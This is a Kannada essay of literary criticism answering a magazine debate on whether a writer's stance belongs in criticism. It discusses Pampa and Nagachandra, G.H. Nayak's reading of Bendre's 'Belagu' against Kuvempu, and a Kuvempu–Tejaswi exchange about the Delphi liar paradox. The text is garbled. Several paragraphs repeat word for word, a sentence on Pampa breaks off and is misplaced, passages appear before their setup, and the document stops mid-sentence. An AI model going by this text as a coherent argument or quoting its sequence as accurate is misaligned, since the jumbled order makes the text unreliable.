ಸಾಹಿತಿಯ ಧೋರಣೆಗಳ ಮುಖಾಮುಖಿ

ಆಗಸ್ಟ್ ಸಂಚಿಕೆಯ ಮುಖ್ಯಚರ್ಚೆ ಚೆನ್ನಾಗಿದೆಯಾದರೂ ಪರಿಣಾಮಕಾರಿಯಾಗಿಲ್ಲ. ಆಯಾ ವಿಮರ್ಶಕರ ಲೇಖನಗಳಲ್ಲಿಯ ಮಾತುಗಳನ್ನು ಹಿಂದೆ ಎಲ್ಲೆಲ್ಲಿಯೋ ಕೇಳಿದ್ದ, ಓದಿದ್ದ ನೆನಪುಗಳನ್ನು ಮರುಕಳಿಸುವಂತೆ ಮಾಡುತ್ತವೆ.

‘ಸಮಾಜಮುಖಿ’ ತಿಂಗಳ ಪತ್ರಿಕೆ ತನ್ನ ಆಗಸ್ಟ್ ಸಂಚಿಕೆಯಲ್ಲಿ ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಗೆ ಸಂಬಂಧಿಸಿದಂತೆ; ಎರಡು ಮುಖ್ಯ ಪ್ರಶ್ನೆಗಳನ್ನು ಮುಂದಿಟ್ಟು ಕೆಲವು ಪರಿಣತ ವಿಮರ್ಶಕರಿಂದ ಉತ್ತರ ಪಡೆದು ಪ್ರಕಟಿಸಿದೆ. ಆದರೆ, ಆ ಉತ್ತರಗಳು ಸಂಬಂಧಪಟ್ಟ ಪ್ರಶ್ನೆಗಳಿಗೆ ನೇರಾನೇರ ಮುಖಾಮುಖಿಯಾಗಿ ಪ್ರಯೋಗಾತ್ಮಕವಾಗಿ ಸ್ಪಂದಿಸಿವೆ ಎಂದು ನನಗನಿಸುತ್ತಿಲ್ಲ. ಇದಕ್ಕೆ ಮುಖ್ಯ ಕಾರಣ ಪ್ರಶ್ನೆಗಳಿಗೆ ಎದುರಾಗುವ ತರಾತುರಿಯಲ್ಲಿ; ಆ ಪ್ರಶ್ನೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ಕೆಲವು ಲೇಖಕರು ಎದುರಿಸುತ್ತಿರುವ ಸಮಸ್ಯೆಗಳನ್ನು ತುಸು ವಿವರಣಾತ್ಮಕವಾಗಿಯೇ ಬರೆದು ಬೆರಳಿಟ್ಟು ತೋರುತ್ತಿರುವುದನ್ನು ಯಾರೂ ಸರಿಯಾಗಿ ಗಮನಿಸುತ್ತಿಲ್ಲ.

ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಸಮಾಜಮುಖಿಯ ಪ್ರಶ್ನೆಗಳನ್ನು ಗಮನಿಸಿ:

1.ಸಾಹಿತಿಯ ಬೇರೆಲ್ಲ ಕೃತಿಗಳನ್ನು, ಹಿನ್ನೆಲೆಯನ್ನು ಮತ್ತು ಸಾರ್ವಜನಿಕರ ನಿಲುವು ಧೋರಣೆಗಳನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ನಿರ್ಲಕ್ಷಿಸಿ ಕೃತಿಯೊಂದನ್ನು ಕೇವಲ ಅದರ ಪಠ್ಯಕ್ಕೆ ಸೀಮಿತಗೊಳಿಸಿ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಮಾಡಬೇಕೇ?

(ಈ ಪ್ರಶ್ನೆಯ ರಚನಾಕ್ರಮದಲ್ಲಿಯೇ ‘ಹಾಗೆ ಮಾಡುವಂತಿಲ್ಲ’ಎಂಬ ನಿಲುವಿರುವುದನ್ನು ಗಮನಿಸಿಯೂ) ಒಂದು ಹಂತದವರೆಗೆ ಹಾಗೆ ಮಾಡುವುದು ಒಳ್ಳೆಯದೆಂದು ನಾನು ಭಾವಿಸಿದ್ದೇನೆ. ನನ್ನ ಈ ಅನಿಸಿಕೆಗೆ ಪೂರಕವಾಗಿ ಎರಡನೆಯ ಪ್ರಶ್ನೆಯನ್ನು ಗಮನಿಸಿ:

ಜಾತಿಯಲ್ಲಿ ಬ್ರಾಹ್ಮಣನಾಗಿ ಧರ್ಮದಲ್ಲಿ ಜೈನನಾದ ಪಂಪ ಅನಿವಾರ್ಯವಾಗಿ ‘ಆಗಮಿಕ-ಲೌಕಿಕ’ ಎಂಬಂತೆ ಎರಡು ದೋಣಿಯ ಮೇಲೆ ಕಾಲಿಟ್ಟು ನಡೆದು,

2.ಸಾಹಿತಿಯ ಪೂರ್ವಾಪರ, ಇಲ್ಲಿಯವರೆಗಿನ ಬರಹಗಳು ಹಾಗೂ ಪ್ರಚ್ಛನ್ನ ಪ್ರಕಾಶಿತ ಧೋರಣೆಗಳನ್ನು ಬಿಟ್ಟು ಕೃತಿಯೊಂದರಲ್ಲಿ ಅಡಕವಾಗಿರುವ ಸತ್ಯ-ಆಶಯಗಳ ಹುಡುಕಾಟ ಮತ್ತು ಮೌಲ್ಯಮಾಪಕ ವಿಮರ್ಶೆ ಸಾಧ್ಯವೇ?

(ಈ ಮೇಲಿನ ಪ್ರಶ್ನೆಯಂತೆ ಈ ಪ್ರಶ್ನೆಯಲ್ಲಿಯೂ ಅಂತರ್ಗತವಾಗಿರುವ ಉತ್ತರದಂತೆ) ‘ಸಾಧ್ಯವಿಲ್ಲ’ ಎಂಬುದಾಗಿ ಸಹಮತ ಸೂಚಿಸುತ್ತೇನೆ.

ಪರಸ್ಪರ ಪೂರಕವಾಗಿರುವ ಈ ಎರಡೂ ಪ್ರಶ್ನೆಗಳನ್ನು ಹುಟ್ಟುಹಾಕಿರುವ ಸಂಚಿಕೆಯ ಮುಖ್ಯಚರ್ಚೆಯ ಮುಖ್ಯ ಪ್ರಶ್ನೆಯನ್ನು ಈಗ ಗಮನಿಸಿ:

ಸಾಹಿತ್ಯ ಕೃತಿಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಸಾಹಿತಿಯ ಧೋರಣೆ ಪರಿಗಣಿಸಬೇಕೆ?

ಅನುಮಾನ ಬೇಡ, ಪರಿಗಣಿಸಬೇಕು. ಹಾಗಿಲ್ಲದಿದ್ದರೆ ಕನ್ನಡ ಸಾಹಿತ್ಯಚರಿತ್ರೆಗೆ ದ್ರೋಹ ಬಗೆದಂತಾಗುತ್ತದೆ. ಪರಿಗಣಿಸಲೇಬೇಕಾದ ಒತ್ತಡ ಕವಿರಾಜಮಾರ್ಗದ ‘ಪಾಪಮಿದು ಪುಣ್ಯಮಿದು’ವಿನಿಂದಲೇ ಪ್ರಾರಂಭವಾಗುತ್ತದೆ. ಜಾತಿಯಲ್ಲಿ ಬ್ರಾಹ್ಮಣನಾಗಿ ಧರ್ಮದಲ್ಲಿ ಜೈನನಾದ ಪಂಪ ಅನಿವಾರ್ಯವಾಗಿ ‘ಆಗಮಿಕ-ಲೌಕಿಕ’ ಎಂಬಂತೆ ಎರಡು ದೋಣಿಯ ಮೇಲೆ ಕಾಲಿಟ್ಟು ನಡೆದು,

ಕಥೆ ಜಿನಚರಿತಮೆ ಕವಿ ಜಿನ
ಕಥೆಯಂ ಪೇಳ್ದವನೆ ರಾಜವಿಟ ಚೋರ ಕಥಾ
ಕಥೆ ಕಥೆಯೆ ಕವಿ ಕವಿಯೆ ತ
ತ್ಕಥೆಯಂ ಪೇಳ್ದಪ್ರಶಸ್ತಮಂ ಪುಟ್ಟಿಸುಗುಂ
(ನಾಗಚಂದ್ರ ಸಮಗ್ರ ಸಂಪುಟ, ಪುಟ 10)

ಎಂದು ಹೇಳಿದ ‘ಆಗಮಿಕ’ ಮಾತ್ರ ಕವಿಯಾದ ನಾಗಚಂದ್ರನಿಂದ ಇವನೂ (ಪಂಪನು) ಒಬ್ಬ ಕವಿಯೇ ಎಂಬಂತೆ ಭಂಗಿಸಿಕೊಳ್ಳಬೇಕಾಗಿ ಬಂದದ್ದು, ಸಾಹಿತ್ಯದಲ್ಲಿ ಸಾಹಿತಿಯ ಧೋರಣೆ ಎಷ್ಟು ಮುಖ್ಯ ಎಂಬುದಾಗಿ ನಾಗಚಂದ್ರ ಸೂಚಿಸುತ್ತಿರುವುದನ್ನು ವಿಮರ್ಶೆ ಅನಿವಾರ್ಯವಾಗಿ ಗಮನಿಸಲೇಬೇಕು. ಯಾಕೆಂದರೆ ಸಾಹಿತ್ಯ ಜೀವನವನ್ನು ಕುರಿತದ್ದು; ಅದಕ್ಕೆ ಅದರ ಶಾಂತಿ ಸುಭಿಕ್ಷಗಳು ಬಹಳ ಮುಖ್ಯ. ಹಾಗಾಗಿ ವಿಮರ್ಶಕ ಬೇರೇನಾದರೂ ಮಾಡಲಿ, ಮಾಡದಿರಲಿ ಸಾಹಿತ್ಯದಲ್ಲಿ ಸಾಹಿತಿಯ ಧೋರಣೆಯನ್ನು ನಿಚ್ಚಳವಾಗಿ ಗುರುತಿಸಿ ಮೌಲ್ಯಮಾಪನ ಮಾಡಬೇಕು.

1970ರ ದಶಕದಲ್ಲಿ ನವ್ಯ ವಿಮರ್ಶಕರು ಕುವೆಂಪು ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ಪುಡಿಗಟ್ಟುತ್ತಿದ್ದ ಸಂದರ್ಭವೊಂದನ್ನು ನೆನಪು ಮಾಡಿಕೊಳ್ಳಿ.

‘ಬೆಳಗು’ಕವನದಲ್ಲಿ ‘ಇದು ಬರಿ ಬೆಳಗಲ್ಲೋ ಅಣ್ಣಾ’ ಎನ್ನುವಲ್ಲಿನ, ಆ ‘ಬರಿ’ ಪದ ತುಂಬಿಕೊಳ್ಳುವ ಅರ್ಥಭಾರ ಈ ‘ಬರಿ’ಗಳಿಗಿಲ್ಲ ಎಂದು ಮುಂತಾಗಿ ಬರೆದು ಕುವೆಂಪು ಕವನದ‘ವೈಫಲ್ಯ’ವನ್ನು, ಬೇಂದ್ರೆ ಕವನದ‘ಸಾಫಲ’್ಯವನ್ನು‘ಸರಿ’ಯಾಗಿಯೇ ವಿವರಿಸಿದ್ದಾರೆ.

ಆಗ ಜಿ.ಎಚ್.ನಾಯಕರು ತಮ್ಮ ನವ್ಯ ವಿಮರ್ಶೆಯ ಹುಮ್ಮಸ್ಸಿನಲ್ಲಿ ಕುವೆಂಪು ಅವರ ‘ಆನಂದಮಯ ಈ ಜಗಹೃದಯ’ಮತ್ತು ಬೇಂದ್ರೆಯವರ‘ಬೆಳಗು’ಕವನವನ್ನು ಎದುರುಬದರಾಗಿಸಿ-‘ಬಿಸಿಲಿದು ಬರಿ ಬಿಸಿಲಲ್ಲವೋ, ಸೂರ್ಯನು ಬರಿ ರವಿಯಲ್ಲವೋ’ಎಂದು ಹೇಳುವುದು ಕವನದ ಒಳಗೆ ಭಾಷೆಯ ಮೂಲಕವೇ ಆವಿಷ್ಕಾರಗೊಳಿಸಿ ಕೊಡುವ ಅನುಭವವಾಗದೆ, ಕೇವಲ ಶಾಬ್ದಿಕ ಘೋಷಣೆಯಾಗಿ ಬಿಡುತ್ತದೆ. ‘ಬೆಳಗು’ಕವನದಲ್ಲಿ ‘ಇದು ಬರಿ ಬೆಳಗಲ್ಲೋ ಅಣ್ಣಾ’ ಎನ್ನುವಲ್ಲಿನ, ಆ ‘ಬರಿ’ ಪದ ತುಂಬಿಕೊಳ್ಳುವ ಅರ್ಥಭಾರ ಈ ‘ಬರಿ’ಗಳಿಗಿಲ್ಲ ಎಂದು ಮುಂತಾಗಿ ಬರೆದು ಕುವೆಂಪು ಕವನದ‘ವೈಫಲ್ಯ’ವನ್ನು, ಬೇಂದ್ರೆ ಕವನದ‘ಸಾಫಲ’್ಯವನ್ನು‘ಸರಿ’ಯಾಗಿಯೇ ವಿವರಿಸಿದ್ದಾರೆ.

ಆದರೆ, ಈ ಎರಡೂ ಕವನಗಳು ಯಾವ ಬಗೆಯ ಓದುಗರನ್ನು ಎದುರಿಗಿರಿಸಿಕೊಂಡು ರಚನೆಯಾಗಿದ್ದವು ಎಂಬುದನ್ನು ನೆನೆದಾಗ ಮಾತ್ರ, ಆ ವಿಮರ್ಶೆಯ ಸೋಲು ಕೂಡ ಅರ್ಥವಾಗುತ್ತದೆ. ಕುವೆಂಪು ಅವರಿಗಿದ್ದ ಪ್ರತಿಭಾಶಕ್ತಿ ಮತ್ತು ಕಸುಬುದಾರಿಕೆಗಳು ಏಗೈಯ್ಯಲುಂ ಸಮಥರ್ವಾಗಿದ್ದವು ಎಂಬುದೀಗ ಸರ್ವವಿದಿತ. ಜಿ.ಎಚ್.ನಾ. ಅವರ ಈ ನಿಲವಿಗೆ ಕಾರಣ ಅವರ ವಿಮರ್ಶಾಶಕ್ತಿ ಮತ್ತು ಪ್ರಾಮಾಣಿಕತೆಗೆ ಸಂಬಂಧಿಸಿದ್ದಲ್ಲ, ಬದಲಿಗೆ ರಾಜೇಂದ್ರ ಚೆನ್ನಿಯವರು ತಿಳಿಸಿರುವಂತೆ ನವ್ಯ ವಿಮರ್ಶೆಯ ಸೀಮಿತ ದುರ್ಬಲ ಮಾನದಂಡಗಳು.

ಕಳೆದ ನೂರು ವರ್ಷಗಳಲ್ಲಿ ಈ ಕವಿತೆ ಕುರಿತ ವಿಮರ್ಶೆಯಲ್ಲಿ ಇದು ಬಿಟ್ಟು ಬೇರೇನೂ ನನಗೆ ಕೇಳಿ ಬಂದಿಲ್ಲ. ಕವನದ ಒಂದೊಂದು ಚರಣವೂ ಒಂದೊಂದು ಇಂದ್ರಿಯವನ್ನು ತನ್ಮಯಗೊಳಿಸುವ ಅನನ್ಯ ಮಾರ್ದವತೆಯಿಂದ ಕೂಡಿದೆ ಎಂಬುದೇ ನಿಜವಾಗಿರುವಾಗ, ಆರನೆಯ ಚರಣವಾದ

ಬೇಂದ್ರೆಯವರ ‘ಬೆಳಗು’ ಕವನಕ್ಕೆ ಈಗ ನೂರು ವರ್ಷ. ಹಾಗಾಗಿ, ಈ ಕವಿತೆಯ ಕುರಿತು ಈಗ ಸಾಲು ಸಾಲು ಚರ್ಚೆ ನಡೆಯುತ್ತಿದೆ. ಮೊನ್ನೆ ಮೈಸೂರು ಆಕಾಶವಾಣಿಯಲ್ಲಿಯೂ ಐದು ಜನ ಹಿರಿ-ಕಿರಿಯ ಕನ್ನಡದ ವಿಮರ್ಶಕರು ‘ಬೆಳಗು’ಕವಿತೆಯನ್ನು ಕುರಿತು ಏಕತಾನತೆಯಲ್ಲಿ ಮಾತನಾಡಿದ್ದರು. ಹೇಗೆ ಪ್ರತಿಯೊಂದು ಇಂದ್ರಿಯಕ್ಕೂ ಆ ಕವಿತೆ ಸ್ಪಂದಿಸಿದೆ ಎಂಬುದನ್ನು ವಿವರಿಸಿದ್ದರು. ಕಳೆದ ನೂರು ವರ್ಷಗಳಲ್ಲಿ ಈ ಕವಿತೆ ಕುರಿತ ವಿಮರ್ಶೆಯಲ್ಲಿ ಇದು ಬಿಟ್ಟು ಬೇರೇನೂ ನನಗೆ ಕೇಳಿ ಬಂದಿಲ್ಲ. ಕವನದ ಒಂದೊಂದು ಚರಣವೂ ಒಂದೊಂದು ಇಂದ್ರಿಯವನ್ನು ತನ್ಮಯಗೊಳಿಸುವ ಅನನ್ಯ ಮಾರ್ದವತೆಯಿಂದ ಕೂಡಿದೆ ಎಂಬುದೇ ನಿಜವಾಗಿರುವಾಗ, ಆರನೆಯ ಚರಣವಾದ

ಕಂಡಿತು ಕಣ್ಣು ಸವಿದಿತು ನಾಲಗೆ
ಪಡೆದೀತೀ ದೇಹಾ
ಸ್ಪರ್ಶ ಪಡೆದೀತೀ ದೇಹಾ
ಕೇಳಿತು ಕಿವಿಯು ಮೂಸಿತು ಮೂಗು
ತನ್ಮಯವೀ ಗೇಹಾ
ದೇವರ- ದೀ ಮನಸಿನ ಗೇಹಾ

ಎಂಬ ಈ ಸಾಲುಗಳು ಇಡೀ ಕವನದ ಧ್ವನಿ ರಮ್ಯತೆಯನ್ನು ವಾಚ್ಯಗೊಳಿಸುವುದಿಲ್ಲವೇ? ಎಂಬುದನ್ನು ಯಾರು ಕೇಳಿಕೊಳ್ಳದೆ ಹೋದದ್ದು, ವಿಮರ್ಶಕರು ಕವಿಗೆ ಕೊಟ್ಟ ಗೌರವ ಎಂದು ನಾನಂತೂ ತಿಳಿಯುವುದಿಲ್ಲ. ಯಾಕೆಂದರೆ, ಹೀಗೆ ವಾಚ್ಯಗೊಳಿಸಿ ಕವನಾಥರ್ವನ್ನು ತಿಳಿಯಾಗಿಸುವುದು ನವೋದಯ ಕವಿಗಳ ರಚನಾ ವಿಧಾನವಾಗಿದೆ.

“ಸಾಹಿತ್ಯವು ಶೈಲಿಯ ಸೊಗಸಲ್ಲ, ರಂಜನೆಯ ರಸವಲ್ಲ, ಸಿಂಗಾರದ ಸಡಗರವಲ್ಲ, ಮಹಾಪುರುಷ ಮಹಾಪ್ರಕೃತಿಯ ಆತ್ಮರತಿ ಆತ್ಮಕ್ರೀಡೆಯ ಮಹಾರಸಗಳ ನಲಿದಾಟ, ಒಲಿದಾಟ” ಬೇಂದ್ರೆಯವರ ಈ ಮಾತುಗಳು ನನ್ನ ಮಾತುಗಳ ಮೇಲೆ ಬೆಳಕು ಚೆಲ್ಲುತ್ತಿವೆಯಲ್ಲವೇ?

ಈ ಕವನದ ಶ್ಲೇಷಾಲಂಕಾರದ ಒಳನೇಯ್ಗೆಯಲ್ಲಿ ಪ್ರಕೃತಿ ಪುರುಷರ ಮಿಲನ, ಶೃಂಗಾರದ ಅದ್ಭುತ ರಮ್ಯ ವಿವರಗಳಿರುವುದನ್ನು ಇದುವರೆಗಿನ ಕನ್ನಡ ವಿಮರ್ಶೆ ಗಮನಿಸಿಯೇ ಇಲ್ಲ. “ಸಾಹಿತ್ಯವು ಶೈಲಿಯ ಸೊಗಸಲ್ಲ, ರಂಜನೆಯ ರಸವಲ್ಲ, ಸಿಂಗಾರದ ಸಡಗರವಲ್ಲ, ಮಹಾಪುರುಷ ಮಹಾಪ್ರಕೃತಿಯ ಆತ್ಮರತಿ ಆತ್ಮಕ್ರೀಡೆಯ ಮಹಾರಸಗಳ ನಲಿದಾಟ, ಒಲಿದಾಟ” ಬೇಂದ್ರೆಯವರ ಈ ಮಾತುಗಳು ನನ್ನ ಮಾತುಗಳ ಮೇಲೆ ಬೆಳಕು ಚೆಲ್ಲುತ್ತಿವೆಯಲ್ಲವೇ?

ಮೊದಲಿನ ಮೂರೂ ಚರಣಗಳು ಕಟ್ಟಿಕೊಡುವ ಸೃಷ್ಟಿಕ್ರಿಯೆಯ ಪರಿಣಾಮವಾದ ನಾಲ್ಕು ಐದನೆಯ ಚರಣದ ದುಂಬಿ ಮತ್ತು ಹಕ್ಕಿಗಳು ಜೀವದ ವಿಕಾಸಕ್ಕೆ ಹಾದಿ ತೆರೆಯುತ್ತಿವೆ, ಅಲ್ಲವೇ? ಅದುವರೆಗಿನ ಇಂದ್ರಿಯಗಮ್ಯ ವಿವರಗಳಿಂದ ಕೂಡಿದ್ದ ಕವನಾರ್ಥ; ಕಡೆಯ ಚರಣದಲ್ಲಿ ಇದ್ದಕ್ಕಿದ್ದಂತೆ ಅರಿಯದ, ತಿಳಿಯದ ಕಾಣದ ನಿಗೂಢತೆಯಲ್ಲಿ ಲಯವಾಗಿ

ಶಾಂತೀರಸವೇ ಪ್ರೀತಿಯಿಂದ
ಮೈದೋರಿತಣ್ಣಾ
ಇದು ಬರಿ ಬೆಳಗಲ್ಲೋ ಅಣ್ಣಾ

ಎನ್ನುವುದರ ಮೂಲಕ ಸುಪ್ರಕಟವಾಗಿ ಕೊನೆಯಾಗುತ್ತದೆ. ಆದರೆ, ಕವನಾರ್ಥ ಸ್ಥಾಯಿಯಾಗಿ ಅನುರಣಗೊಳ್ಳುತ್ತಲೇ ಉಳಿಯುತ್ತದೆ. ಯಾಕೆಂದರೆ, ಇದು‘ಬರಿಯ’ಸೂರ್ಯೋದಯದ ವರ್ಣಾನಾತ್ಮಕ ಕವನವಲ್ಲ; ಮುಖ್ಯವಾಗಿ ಪ್ರಕೃತಿ ರಹಸ್ಯವನ್ನು ಭೇದಿಸುವ ವಿಚಾರಪೂರಿತ ಕವನ.

ಕುವೆಂಪು ಮತ್ತು ತೇಜಸ್ವಿ-ಮಾರಾಮಾರಿ

ಗ್ರೀಸಿನ ಡೆಲ್ಫಿ ದೇವಸ್ಥಾನದಲ್ಲಿ ಒಂದು ಪ್ರಖ್ಯಾತ ಕಂಚಿನ ನಾಣ್ಯ ಅಥವಾ ಕಂಚಿನ ಫಲಕ ಅಂತಿಟ್ಟುಕೋ ಇದೆಯಂತೆ. ಅದರ ಒಂದು ಕಡೆ ‘ಈ ಫಲಕದ ಆಚೆ ಕಡೆ ಕೆತ್ತಿರುವುದು ನಿಜ’ ಎಂದು ಕೆತ್ತಿದ್ದಾರೆ.

“ಏನೀಗ ಹಾಗೆ ಕೆತ್ತಿದ್ದರೆ?”

“ಸ್ಪಲ್ಪ ತಾಳ್ಮೆಯಿಂದ ಹೇಳುವುದನ್ನು ಕೇಳಿಸಿಕೋ, ನಿನ್ನ ಅವಸರ ಅಸಹನೆಯನ್ನು ಹದ್ದುಬಸ್ತಿನಲ್ಲಿಡುವುದನ್ನು ಕಲಿಯದಿದ್ದರೆ ನಿನಗೆ ಉದ್ಧಾರ ಇಲ್ಲ”

“ಹೇಳಿ ಆಮೇಲೇನಾಯ್ತು ಅಂತ”

“ಆಮೇಲೇನಾಗುವುದಕ್ಕೆ ಇದು ಕತೆಯಲ್ಲ, ಆ ನಾಣ್ಯದ ಆಚೆಕಡೆ ‘ಈ ನಾಣ್ಯದ ಆಚೆಕಡೆ ಕೆತ್ತಿರುವುದು ಸುಳ್ಳು’ ಅಂತ ಕೆತ್ತಿದ್ದಾರೆ, ಹಾಗೆ ಕೆತ್ತಿ ಅದನ್ನು ಒಂದು ದಾರಕ್ಕೆ ಸುರಿದು ನೇತು ಹಾಕಿದ್ದಾರೆ.” (ತೇಜಸ್ವಿ-ವಿಮರ್ಶೆಯ ವಿಮರ್ಶೆ, ಪುಟ 49)

ಇದಿಷ್ಟು ಕುವೆಂಪು ಮತ್ತು ತೇಜಸ್ವಿಯವರ ನಡುವೆ ಒಂದು ದಿನ ನಡೆದ ಕಥನ ಚರ್ಚೆ. ಇಬ್ಬರ ನಡುವೆಯೂ ನಾಣ್ಯದ ಆಕೀಕಡೆಯ ನಿಜ-ಸುಳ್ಳುಗಳ ಗಿರಿಗಿಟ್ಟಲೆಯ ವಿಷಯಕ್ಕೆ ಬಿಸಿಬಿಸಿ ವಾಗ್ವಾದ ನಡೆದು ಯಾವ ತೀರ್ಮಾನಕ್ಕೂ ಬರಲಾಗದೆ ತೇಜಸ್ವಿ “ನನಗೆ ಆಶ್ಚರ್ಯವಾಯ್ತು. ಇದೇನೋ ಕೊಂಚ ರಹಸ್ಯತರವಾಗಿ ಕಾಣುತ್ತಿದೆಯಲ್ಲಾ ಎಂದು. ನಾನು ಮತ್ತೊಮ್ಮೆ ಯೋಚಿಸಿದೆ. ಈ ನಾಣ್ಯದ ಆ ಕಡೆ ಬರೆದಿರುವುದು ನಿಜ ಎನ್ನುವುದು ಸುಳ್ಳಾದರೆ, ಸುಳ್ಳು ಎನ್ನುವುದೇ ಸುಳ್ಳಾಗುತ್ತದೆಯಲ್ಲವೇ?ಇದು ಸುಳ್ಳಾದರೆ, ಆ ಕಡೆ ಬರೆದಿರುವುದೂ ನಿಜ ಅಲ್ಲವೇ! ಆದರೆ, ಆ ಕಡೆ ಬರೆದಿರುವುದು, ಈ ಕಡೆ ಬರೆದಿರುವುದು ನಿಜ ಅನ್ನುವುದರಿಂದ… ನನಗೆ ಆ ಹೇಳಿಕೆಯ ಮೇಲೆಯೇ ಸಿಟ್ಟು ಬಂತು. ಹೇಳುವುದೇನಾದರೂ ಇದ್ದರೆ ನೇರವಾಗಿ ಸ್ಪಷ್ಟವಾಗಿ ಹೇಳಬಾರದೆ? ಇಂಥ ಒಗಟುಗಳನ್ನು ಯಾವ ಮಹತ್ವದ ಸಂದೇಶ ಎಂದು ದೇವಸ್ಥಾನದಲ್ಲಿ ನೇತು ಹಾಕಿದ್ದಾರೆ?”

‘ಆಧುನಿಕ ತತ್ವಶಾಸ್ತ್ರದ ಪೀಠಿಕೆ’ ಎಂಬ ಪುಸ್ತಕ ತೆಗೆದುಕೊಂಡೆ. ಪಾಶ್ಚಿಮಾತ್ಯ ತತ್ವಪರಂಪರೆಯನ್ನು ಎಷ್ಟು ಅದ್ಭುತವಾಗಿ ಆ ಚಿಕ್ಕ ಪುಸ್ತಕದಲ್ಲಿ ಅವರು ವಿವರಿಸಿದ್ದಾರೆಂದರೆ, ಆ ಪುಸ್ತಕ ಓದಿದ ನಂತರ ನನಗೂ ಸಾಹಿತ್ಯಕ್ಕಿಂತ ತತ್ವಶಾಸ್ತ್ರದಲ್ಲೇ ಆಸಕ್ತಿ ಹೆಚ್ಚಾಯಿತು. ಆಮೇಲೆ ನನಗೆ ಅಣ್ಣ ವಿಲ್ ಡ್ಯುರಾಂಟ್ ಅವರ ‘ತತ್ವಶಾಸ್ತ್ರದ ಕತೆ’ ಓದಲು ಹೇಳಿದರು.

ಈ ರೀತಿಯ ಅಸಹನೆ ತೇಜಸ್ವಿಗೆ ಅಸಹಜ ಏನಲ್ಲ. ಈ ಪ್ರಚೋದಿತ ಪ್ರಸಂಗ ತೇಜಸ್ವಿಯವರನ್ನು ಪ್ರಾಚ್ಯ ಪಾಶ್ಚಾತ್ಯ ತತ್ವಜ್ಞಾನಿಗಳನ್ನು ಕುರಿತು ಆಳವಾಗಿ ಅಧ್ಯಯನಕ್ಕೆ ಹಚ್ಚಿತು. ಪೂರ್ವಪಶ್ಚಿಮಗಳೆರಡನ್ನೂ ಚೆನ್ನಾಗಿಯೇ ಅರಿತ ತೇಜಸ್ವಿ ಪ್ರಾಚ್ಯದವರ ಸಮನ್ವಯ ಸಿದ್ಧಾಂತದ ಮೇಲೆ ಕೆಂಡದ ಮಳೆಗರೆಯತೊಡಗಿದ್ದು ವಿಶೇಷ. ತೇಜಸ್ವಿಯವರ ಭಾರತೀಯ ತತ್ವಚಿಂತನೆಯ ಕ್ರಮವನ್ನು ಅದರ ಗುಣ-ದೋಷಗಳೊಡನೆ ವಿವರಿಸುವ ಈ ಕೆಳಗಿನ ಉದಾಹರಣೆಯನ್ನು ಗಮನಿಸಿ.

“ಒಂದು ದಿನ ಅಣ್ಣನ ಬೀರುವಿನಿಂದ ಸಿ.ಇ.ಎಂ.ಜೋಡ್ ಬರೆದಿದ್ದ ‘ಆಧುನಿಕ ತತ್ವಶಾಸ್ತ್ರದ ಪೀಠಿಕೆ’ ಎಂಬ ಪುಸ್ತಕ ತೆಗೆದುಕೊಂಡೆ. ಪಾಶ್ಚಿಮಾತ್ಯ ತತ್ವಪರಂಪರೆಯನ್ನು ಎಷ್ಟು ಅದ್ಭುತವಾಗಿ ಆ ಚಿಕ್ಕ ಪುಸ್ತಕದಲ್ಲಿ ಅವರು ವಿವರಿಸಿದ್ದಾರೆಂದರೆ, ಆ ಪುಸ್ತಕ ಓದಿದ ನಂತರ ನನಗೂ ಸಾಹಿತ್ಯಕ್ಕಿಂತ ತತ್ವಶಾಸ್ತ್ರದಲ್ಲೇ ಆಸಕ್ತಿ ಹೆಚ್ಚಾಯಿತು. ಆಮೇಲೆ ನನಗೆ ಅಣ್ಣ ವಿಲ್ ಡ್ಯುರಾಂಟ್ ಅವರ ‘ತತ್ವಶಾಸ್ತ್ರದ ಕತೆ’ ಓದಲು ಹೇಳಿದರು. ಆ ಮೇಲಿನಿಂದ ನಾನು ನೇರವಾಗಿ ಕ್ಯಾಂಟ್, ಹೆಗಲ್, ಕರ್ಕೆ ಗಾರ್ಡ್, ರಸೆಲ್ ಇವರನ್ನೆಲ್ಲಾ ಓದತೊಡಗಿದೆ. ಅಣ್ಣನ ಹತ್ತಿರ ದಿನಾ ತತ್ವಮೀಮಾಂಸೆಯ ಚರ್ಚೆ ಶುರುವಾಯ್ತು. ಆಗೆಲ್ಲ ಅಣ್ಣಾ ಭಾರತೀಯ ತತ್ವಶಾಸ್ತ್ರ ಯೂರೋಪಿಯನ್ ತತ್ವಶಾಸ್ತ್ರಕ್ಕಿಂತ ಯಾವ ರೀತಿಯಲ್ಲೂ ಹಿಂದೆ ಬಿದ್ದಿಲ್ಲ ಎಂದು ಹೇಳುತ್ತಿದ್ದರು. ಅಣ್ಣನ ಮಾತನ್ನು ನಂಬಿ ನಾನು ಭಾರತೀಯ ತತ್ವಶಾಸ್ತ್ರದ ಪೀಠಿಕೆ, ವ್ಯಾಖ್ಯಾನಗಳಂತಿರುವ ಕೆಲವು ಗ್ರಂಥಗಳನ್ನು ಓದಿದೆ. ಪಾಶ್ಚಿಮಾತ್ಯ ತತ್ವ ಗ್ರಂಥಗಳನ್ನು ಸರಿಗಟ್ಟುವಂಥ ಗ್ರಂಥಗಳು ಭಾರತೀಯ ತತ್ವಶಾಸ್ತ್ರದ ಮೇಲೆ ನಮ್ಮವರು ಬರೆದದ್ದು ಒಂದೂ ನನಗೆ ಈವರೆಗೆ ಸಿಕ್ಕಲಿಲ್ಲ. ಅಷ್ಟೇ ಅಲ್ಲ ಜಾತಿ, ಮತ, ಜಗದ್ಗುರುಗಳ ಹಾವಳಿಯಿಂದ ಭಾರತೀಯ ತತ್ವಪರಂಪರೆ ಸರ್ವನಾಶವಾಗಿದೆ ಎಂದೇ ನನ್ನ ಅಭಿಪ್ರಾಯ. ಎಲ್ಲಕ್ಕಿಂತ ಅಸಹ್ಯವಾಗಿರುವುದು ಎಲ್ಲ ಮತಧರ್ಮಗಳೂ ಒಂದೇ ದೇವರ ಕಡೆ ಹೋಗುತ್ತವೆನ್ನುವ ಅಪ್ರಬುದ್ಧ ಧೋರಣೆಯಲ್ಲಿ. ಎಲ್ಲ ತತ್ವಗಳು ಅನುಷಂಗಿಕವಾಗಿಯೇ 